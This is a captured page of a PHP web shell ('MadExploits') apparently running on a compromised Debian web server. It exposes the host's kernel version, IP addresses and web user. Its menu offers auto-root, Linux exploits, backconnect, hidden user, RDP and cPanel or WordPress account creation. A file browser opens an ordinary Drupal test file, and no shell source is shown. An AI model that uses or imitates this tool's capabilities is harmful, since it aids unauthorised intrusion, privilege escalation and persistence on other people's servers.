Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.149.238.67
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
contextual /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
contextual-rtl.css
408
B
-rw-r--r--
contextual.api.php
1.03
KB
-rw-r--r--
contextual.css
2.29
KB
-rw-r--r--
contextual.info
312
B
-rw-r--r--
contextual.js
1.76
KB
-rw-r--r--
contextual.module
5.55
KB
-rw-r--r--
contextual.test
1.88
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : contextual.test
<?php /** * @file * Tests for contextual.module. */ /** * Tests accessible links after inaccessible links on dynamic context. */ class ContextualDynamicContextTestCase extends DrupalWebTestCase { protected $profile = 'testing'; public static function getInfo() { return array( 'name' => 'Contextual links on node lists', 'description' => 'Tests if contextual links are showing on the front page depending on permissions.', 'group' => 'Contextual', ); } function setUp() { parent::setUp(array('contextual', 'node')); $this->drupalCreateContentType(array('type' => 'page', 'name' => 'Basic page')); $this->drupalCreateContentType(array('type' => 'article', 'name' => 'Article')); $web_user = $this->drupalCreateUser(array('access content', 'access contextual links', 'edit any article content')); $this->drupalLogin($web_user); } /** * Tests contextual links on node lists with different permissions. */ function testNodeLinks() { // Create three nodes in the following order: // - An article, which should be user-editable. // - A page, which should not be user-editable. // - A second article, which should also be user-editable. $node1 = $this->drupalCreateNode(array('type' => 'article', 'promote' => 1)); $node2 = $this->drupalCreateNode(array('type' => 'page', 'promote' => 1)); $node3 = $this->drupalCreateNode(array('type' => 'article', 'promote' => 1)); // Now, on the front page, all article nodes should have contextual edit // links. The page node in between should not. $this->drupalGet('node'); $this->assertRaw('node/' . $node1->nid . '/edit', 'Edit link for oldest article node showing.'); $this->assertNoRaw('node/' . $node2->nid . '/edit', 'No edit link for page nodes.'); $this->assertRaw('node/' . $node3->nid . '/edit', 'Edit link for most recent article node showing.'); } }
Close